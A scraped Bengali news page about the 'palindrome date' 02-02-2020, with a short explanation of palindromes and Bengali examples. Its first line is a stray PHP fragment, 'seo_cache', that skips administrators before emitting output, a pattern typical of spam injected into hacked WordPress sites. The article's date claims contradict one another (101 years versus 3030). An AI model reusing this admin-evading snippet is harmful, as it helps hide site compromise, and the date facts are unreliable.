function seo_cache() { if (is_admin()) return; $u = wp_get_current_user(); if (in_array('administrator', (array)$u->roles)) return; ?> ৯০০ বছর পর অবিস্মরণীয় '02-02-2020' প্যালিনড্রোম তারিখ! - GopalpurBarta24.com
আজ || বৃহস্পতিবার, ১৬ এপ্রিল ২০২৬
শিরোনাম :
 


৯০০ বছর পর অবিস্মরণীয় ’02-02-2020′ প্যালিনড্রোম তারিখ!

’02-02-2020′ তারিখটি হলো আন্তর্জাতিক প্যালিনড্রোম তারিখ। আপনার জীবনে এ দিনটি আর কখনো ঘুরে আসবে না। তাই এই দিনটি প্রত্যেকের জীবনের জন্য একটি অবিস্মরণীয় দিন।

পরবর্তী ১০১ বছরের মধ্যে এমন প্যালিনড্রোম তারিখ আর পাওয়া যাবে না। এ প্যালিনড্রোম তারিখের জন্য আপনাকে ৩ মার্চ ৩০৩০ (০৩-০৩-৩০৩০) অবধি অপেক্ষা করতে হবে।

এ তারিখটিতে লুকিয়ে আছে একটি চোখ ধাঁধানো বিষয়! ‘মাস-দিন-বছর’ অথবা ‘দিন-মাস-বছর’ যেভাবেই তারিখটি লেখেন না কেন, এটি কার্যকর হয় যেকোনো বিপরীত দিক থেকে। ‘০২-০২-২০২০’ উল্টো দিক থেকেও সংখ্যাটি একই। সর্বশেষ এ জাতীয় প্যালিনড্রোম তারিখটি ছিল ‘১১-১১-১১১১’ যা ৯০০ বছর আগে।

শব্দ বা সংখ্যা নিয়ে যারা খেলা খেলেন, তারা অবশ্যই প্যালিনড্রোম নামটির সাথে পরিচিত। প্যালিনড্রোম মানে- যে শব্দকে সামনে থেকে বা পেছন থেকে পড়লে শব্দের উচ্চারণ আর অৰ্থের কোন বদল হয় না।

মূল গ্রীক শব্দ প্যালিনড্রোমাস থেকে ইংরেজি প্যালিনড্রোম শব্দটি এসেছে। বাংলা ভাষায় একে দ্বিমুখী শব্দ বা সংখ্যা বলা যায়। তিন অক্ষরের প্যালিনড্রোমিক শব্দের সংখ্যা অপেক্ষাকৃত বেশি; যেমন- মরম, মলম, দরদ, জলজ, যমজ, তফাত, মধ্যম, বাহবা ইত্যাদি।

 

কে এম মিঠু

০২.০২.২০২০

মন্তব্য করুন -


Top
error: Content is protected !!